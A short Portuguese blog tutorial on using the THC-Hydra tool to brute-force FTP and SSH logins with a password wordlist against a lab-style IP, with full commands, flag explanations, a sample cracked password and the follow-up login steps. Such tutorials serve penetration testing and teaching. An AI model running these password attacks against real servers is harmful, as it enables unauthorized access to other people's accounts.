InformationSecurityPro
Marcos Henrique
THC-Hydra – Brute Force Attack FTP e SSH
O Hydra é uma excelente ferramenta para realização ataques de senhas, os ataques podem ser realizados através de uma lista de palavras "wordlist" contendo uma grande quantidade de usuários e senhas.
Site: www.thc.org/thc-hydra
Veja alguns exemplos básicos de como utilizar o Hydra:
WordList
Crie o arquivo senhas.txt contendo senhas aleatórias que possivelmente possa pertencer a um determinado usuário.
Linuxcat senhas.txt
Ataque ao Servidor FTP
01 - Passo
Execute o comando:
Linuxhydra -l 100security -P senhas.txt 10.10.10.123 ftp
-l : Define o login do usuário.
100security : Login do usuário a ser verificado.
-P : Define o arquivo contendo as possíveis senhas "wordlist".
senhas.txt : Arquivo que contém as possíveis senhas do usuário informado.
10.10.10.123 : IP do servidor FTP.
ftp : Tipo do serviço a ser verificado.
Ao realizar o ataque a senha do usuário informado é revelada caso esta esteja no arquivo senhas.txt.
Login: 100security
Password: P@ssw0rd
02 - Passo
Para validar os acessos estabeleça a conexão como serviço FTP :
Linuxftp 10.10.10.123
Ataque ao Servidor SSH
01 - Passo
Execute o comando:
Linuxhydra -l 100security -P senhas.txt 10.10.10.123 ssh
02 - Passo
Para validar os acessos estabeleça a conexão como serviço SSH :
Linuxssh -l 100security 10.10.10.123
São Paulo/SP
